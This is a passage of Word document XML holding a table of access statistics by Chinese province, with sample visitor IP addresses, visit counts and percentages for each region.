                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>112.66.105.21(1次)</w:t>
              <w:br/>
              <w:t>112.66.105.206(1次)</w:t>
              <w:br/>
              <w:t>112.66.106.226(1次)</w:t>
              <w:br/>
              <w:t>112.66.108.74(1次)</w:t>
              <w:br/>
              <w:t>112.66.108.195(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1.48%</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17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>青海</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>110.167.215.58(1次)</w:t>
              <w:br/>
              <w:t>110.167.215.105(1次)</w:t>
              <w:br/>
              <w:t>110.167.215.124(1次)</w:t>
              <w:br/>
              <w:t>110.167.215.195(1次)</w:t>
              <w:br/>
              <w:t>110.167.215.204(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1.48%</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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>内蒙古</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1.30.8.45(2次)</w:t>
              <w:br/>
              <w:t>1.30.8.154(1次)</w:t>
              <w:br/>
              <w:t>1.30.24.29(1次)</w:t>
              <w:br/>
              <w:t>1.30.28.84(1次)</w:t>
              <w:br/>
              <w:t>1.30.28.243(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1.37%</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19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>安徽</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>36.5.71.28(1次)</w:t>
              <w:br/>
              <w:t>36.5.150.107(1次)</w:t>
              <w:br/>
              <w:t>36.5.196.25(1次)</w:t>
              <w:br/>
              <w:t>36.5.219.131(1次)</w:t>
              <w:br/>
              <w:t>36.32.3.17(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1.37%</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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>云南</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>112.112.185.127(1次)</w:t>
              <w:br/>
              <w:t>112.117.16.160(1次)</w:t>
              <w:br/>
              <w:t>112.117.18.150(1次)</w:t>
              <w:br/>
              <w:t>182.245.7.7(1次)</w:t>
              <w:br/>
              <w:t>182.245.80.47(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1.27%</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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>重庆</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>113.206.130.248(1次)</w:t>
              <w:br/>
              <w:t>123.145.5.123(1次)</w:t>
              <w:br/>
              <w:t>123.145.18.204(1次)</w:t>
              <w:br/>
              <w:t>123.145.19.128(1次)</w:t>
              <w:br/>
              <w:t>123.145.28.173(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1.27%</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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>甘肃</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>27.224.136.184(2次)</w:t>
              <w:br/>
              <w:t>27.224.137.76(2次)</w:t>
              <w:br/>
              <w:t>60.13.6.19(1次)</w:t>
              <w:br/>
              <w:t>180.95.231.58(1次)</w:t>
              <w:br/>
              <w:t>180.95.238.35(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1.16%</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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>陕西</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>125.76.177.221(2次)</w:t>
              <w:br/>
              <w:t>113.200.72.199(1次)</w:t>
              <w:br/>
              <w:t>113.200.72.206(1次)</w:t>
              <w:br/>
              <w:t>117.22.144.16(1次)</w:t>
              <w:br/>
              <w:t>117.22.144.82(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1.16%</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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>山东</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>27.211.56.89(1次)</w:t>
              <w:br/>
              <w:t>39.82.95.17(1次)</w:t>
              <w:br/>
              <w:t>112.230.40.195(1次)</w:t>
              <w:br/>
              <w:t>112.232.247.208(1次)</w:t>
              <w:br/>
              <w:t>113.120.15.56(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>0.95%</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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>上海</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>223.166.74.97(1次)</w:t>
              <w:br/>
              <w:t>223.166.74.121(1次)</w:t>
              <w:br/>
              <w:t>223.166.75.8(1次)</w:t>
              <w:br/>
              <w:t>223.166.75.123(1次)</w:t>
              <w:br/>
              <w:t>223.166.75.183(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>0.85%</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26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>天津</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>36.106.167.15(1次)</w:t>
              <w:br/>
              <w:t>36.106.167.73(1次)</w:t>
              <w:br/>
              <w:t>111.162.146.17(1次)</w:t>
              <w:br/>
              <w:t>117.11.88.206(1次)</w:t>
              <w:br/>
              <w:t>125.36.253.60(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>0.85%</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27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>浙江</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>60.186.192.41(1次)</w:t>
              <w:br/>
              <w:t>106.11.155.102(1次)</w:t>
              <w:br/>
              <w:t>115.200.235.154(1次)</w:t>
              <w:br/>
              <w:t>123.157.193.13(1次)</w:t>
              <w:br/>
              <w:t>123.157.193.140(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>0.85%</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28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>西藏</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>101.249.60.182(1次)</w:t>
              <w:br/>
              <w:t>101.249.60.185(1次)</w:t>
              <w:br/>
              <w:t>101.249.60.217(1次)</w:t>
              <w:br/>
              <w:t>101.249.61.115(1次)</w:t>
              <w:br/>
              <w:t>101.249.61.211(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>0.85%</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29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>河北</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>111.224.6.33(1次)</w:t>
              <w:br/>
              <w:t>111.224.6.75(1次)</w:t>
              <w:br/>
              <w:t>111.224.7.27(1次)</w:t>
              <w:br/>
              <w:t>120.0.52.12(1次)</w:t>
              <w:br/>
              <w:t>120.0.52.158(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>0.74%</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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>湖北</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>58.19.12.106(1次)</w:t>
              <w:br/>
              <w:t>58.19.63.207(1次)</w:t>
              <w:br/>
              <w:t>58.19.81.70(1次)</w:t>
              <w:br/>
              <w:t>59.173.154.206(1次)</w:t>
              <w:br/>
              <w:t>111.175.56.154(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>0.74%</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31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>江西</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>59.52.179.75(1次)</w:t>
              <w:br/>
              <w:t>59.52.179.137(1次)</w:t>
              <w:br/>
              <w:t>59.55.114.53(1次)</w:t>
              <w:br/>
              <w:t>171.34.177.29(1次)</w:t>
              <w:br/>
              <w:t>171.34.179.40(1次)</w:t>
